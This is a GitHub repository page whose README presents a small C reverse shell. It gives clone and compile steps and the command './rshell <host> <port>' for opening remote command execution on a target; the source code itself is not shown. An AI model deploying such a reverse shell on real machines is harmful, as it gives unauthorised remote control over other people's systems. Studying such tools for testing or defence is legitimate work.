Skip to content

FenrirSec/RemoteCShell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

3 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

Remote C Shell 🐚

Welcome to the Remote C Shell repository! This C-based reverse shell enables remote command execution on a target machine.

Usage πŸ“‹

To use the remote shell, run the following command:

./rshell <host> <port>

Files in This Repository πŸ“‚

  • LICENSE: License information for the project.
  • Makefile: Makefile to compile the project.
  • README.md: This readme file.
  • rshell.c: The source code for the reverse shell.

Getting Started πŸš€

  1. Clone the repository:

    git clone https://github.com/fenrirsec/RemoteCShell.git
    cd RemoteCShell
  2. Compile the source code:

    make
  3. Run the reverse shell:

    ./rshell <host> <port>

Replace <host> with the target IP address and <port> with the desired port number.


Stay safe and use responsibly! πŸ›‘οΈ

About

Short remote C shell

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •